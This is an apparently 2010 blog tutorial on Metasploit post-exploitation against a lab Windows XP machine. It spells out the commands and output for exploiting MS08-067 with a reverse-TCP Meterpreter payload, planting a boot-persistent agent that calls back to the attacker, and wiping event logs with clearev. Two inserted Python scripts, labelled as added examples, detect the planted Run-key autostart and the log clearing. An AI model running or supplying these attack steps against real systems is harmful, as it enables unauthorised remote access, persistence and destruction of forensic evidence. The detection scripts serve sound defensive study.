Wednesday, September 15, 2010

Tutorial: Maintaining Access & Clearing Tracks

Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)

Step 1: Detect the OS version on the target machine

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.50
msf auxiliary(smb_version) > run

[*] 131.107.1.50 is running Windows XP Service Pack 2 (language: English) (name:LON-CL1) (domain:FABRIKAM)

Step 2: Exploit the target machine based on a known vulnerability (MS08-067)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.50
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > set LPORT 8888
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 131.107.1.252:8888
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:8888 -> 131.107.1.50:1125)

Step 3: Plant or inject the Meterpreter agent on the target machine

meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -X -p 10000 -r 131.107.1.252
[*] Creating a persistent agent: LHOST=131.107.1.252 LPORT=10000 (interval=5 onboot=true)
sniff..

msf exploit(ms08_067_netapi) > exit -y

Step 4: Create a Meterpreter listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 131.107.1.252
msf exploit(handler) > set LPORT 10000
msf exploit(handler) > exploit

[*] Started reverse handler on 131.107.1.252:10000
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:10000 -> 131.107.1.50:1124)

Note: the Meterpreter agent is installed in the C:\WINDOWS\TEMP directory as a .vbs file, and an autostart entry is created under the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(random) on the target machine.
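From the defender's side, the note above names the two artifacts that survive on the host: a script file in C:\WINDOWS\TEMP and a Run value with a random name that launches it. The Python script below is an added example, not part of this post and not Metasploit code: it parses a regedit export of the Run key and flags entries that start a script from a temp directory or through a script host. The .reg text, the value names and the file name in it are constructed to match the note; the exact command string the persistence script writes is not shown on this page, so the heuristics key on the path and file type rather than on one fixed string.

```python
"""Triage HKLM\\...\\Run autostart entries exported from a Windows host.

Constructed example: the .reg text below is made up to resemble a host on
which a script-based autostart was planted in C:\\WINDOWS\\TEMP; it is not
output captured from any real machine.
"""
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed .reg export (regedit "Export" format). The value names and the
# script file name are arbitrary placeholders.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareUser.exe\""
"KBYQDPzxcv"="cscript //B \"C:\\WINDOWS\\TEMP\\xRnTLkq.vbs\""
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1")
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "%temp%", "\\local settings\\temp\\")


def _unescape(s):
    """Undo .reg string escaping: a backslash before a quote or backslash."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text):
    """Return {key: {value_name: string_data}} for string values in a .reg export."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def suspicious_reasons(command):
    """Heuristic reasons an autostart command deserves a second look."""
    cmd = command.lower()
    reasons = []
    if any(t in cmd for t in TEMP_DIRS):
        reasons.append("launches from a temp directory")
    if any(cmd.endswith(ext) or ext + '"' in cmd or ext + " " in cmd
           for ext in SCRIPT_EXTS):
        reasons.append("runs a script file rather than a signed binary")
    if any(re.search(r"(^|[\\\s\"])" + h + r"(\.exe)?\b", cmd) for h in SCRIPT_HOSTS):
        reasons.append("invokes a script host")
    return reasons


def triage_run_key(reg_text, key=RUN_KEY):
    """Return [(value_name, command, reasons)] for Run entries with at least one reason."""
    entries = parse_reg_export(reg_text).get(key, {})
    findings = []
    for name, command in entries.items():
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append((name, command, reasons))
    return findings


if __name__ == "__main__":
    for name, command, reasons in triage_run_key(SAMPLE_REG_EXPORT):
        print(f"{name!r}: {command}\n    " + "; ".join(reasons))
```

On a live host the same check is run against the output of "reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg" (and the HKCU equivalent, plus RunOnce), after which each flagged file is pulled from C:\WINDOWS\TEMP for inspection before the entry is removed.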

Now you can proceed with the last step, which is Clearing Tracks (Housekeeping), as follows:

meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...
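What clearev leaves behind is itself a detection opportunity: clearing the Security log writes an event recording the clear (ID 517 on Windows 2000/XP/2003, ID 1102 on Vista and later; on Vista and later the System log also records ID 104 when the System or Application log is cleared), and a log whose oldest surviving record post-dates the last known boot has lost history. The script below is an added example, not part of this post: it reads a constructed CSV export of event records (the records, account names and times are made up to resemble the host above) and reports both signals. The CSV column layout and the oldest_expected reference time are assumptions of the example.

```python
"""Spot event-log clearing from exported Windows event records.

Constructed example: the CSV below is made up to resemble records exported
from a host whose logs were just cleared; it is not a capture from any real
machine. Event IDs used: 517 (Security log cleared, Windows 2000/XP/2003),
1102 (Security log cleared, Vista and later) and 104 (System or Application
log cleared, recorded in the System log, Vista and later).
"""
import csv
import io
from collections import defaultdict
from datetime import datetime

# (log name, event id) pairs that mean "a clear was recorded in this log"
CLEAR_EVENTS = {
    ("Security", 517),
    ("Security", 1102),
    ("System", 104),
}

# Constructed export, assumed column layout: log, record number, time, event id, source, user
SAMPLE_CSV = """log,record,time,event_id,source,user
Application,1,2010-09-15T11:03:42,1000,Application Error,N/A
System,1,2010-09-15T11:03:40,7036,Service Control Manager,N/A
Security,1,2010-09-15T11:03:51,517,Security,NT AUTHORITY\\SYSTEM
Security,2,2010-09-15T11:04:10,528,Security,LON-CL1\\Administrator
"""


def parse_events(text):
    """Parse the CSV export into a list of dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "log": row["log"],
            "record": int(row["record"]),
            "time": datetime.fromisoformat(row["time"]),
            "event_id": int(row["event_id"]),
            "source": row["source"],
            "user": row["user"],
        })
    return events


def find_cleared_logs(events, oldest_expected=None):
    """Return findings describing probable log clearing.

    Two signals: an explicit "log cleared" event (the clear itself is logged),
    and a log whose oldest surviving record is newer than oldest_expected
    (ISO string or datetime, e.g. the last known boot), which is what a
    freshly wiped log looks like on a host with any uptime.
    """
    if isinstance(oldest_expected, str):
        oldest_expected = datetime.fromisoformat(oldest_expected)
    by_log = defaultdict(list)
    for ev in events:
        by_log[ev["log"]].append(ev)
    findings = []
    for log in sorted(by_log):
        evs = sorted(by_log[log], key=lambda e: (e["time"], e["record"]))
        first = evs[0]
        for ev in evs:
            if (log, ev["event_id"]) in CLEAR_EVENTS:
                findings.append({
                    "log": log, "signal": "clear event",
                    "event_id": ev["event_id"], "time": ev["time"],
                    "user": ev["user"], "first_record": ev is first,
                })
        if oldest_expected is not None and first["time"] > oldest_expected:
            findings.append({
                "log": log, "signal": "truncated history",
                "event_id": first["event_id"], "time": first["time"],
                "user": first["user"], "first_record": True,
            })
    return findings


def cleared_log_names(events, oldest_expected=None):
    """Sorted names of logs with at least one finding."""
    return sorted({f["log"] for f in find_cleared_logs(events, oldest_expected)})


if __name__ == "__main__":
    # Reference time is an assumption standing in for the last known boot.
    for f in find_cleared_logs(parse_events(SAMPLE_CSV), "2010-09-13T00:00:00"):
        print(f"{f['log']}: {f['signal']} (event {f['event_id']} at {f['time']}, "
              f"user {f['user']}, first surviving record: {f['first_record']})")
```

Because the clear event is written after the wipe, it is normally the first surviving record in the cleared log, as it is in the sample; forwarding logs to a collector the moment they are written is the only way to keep the records that preceded it.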
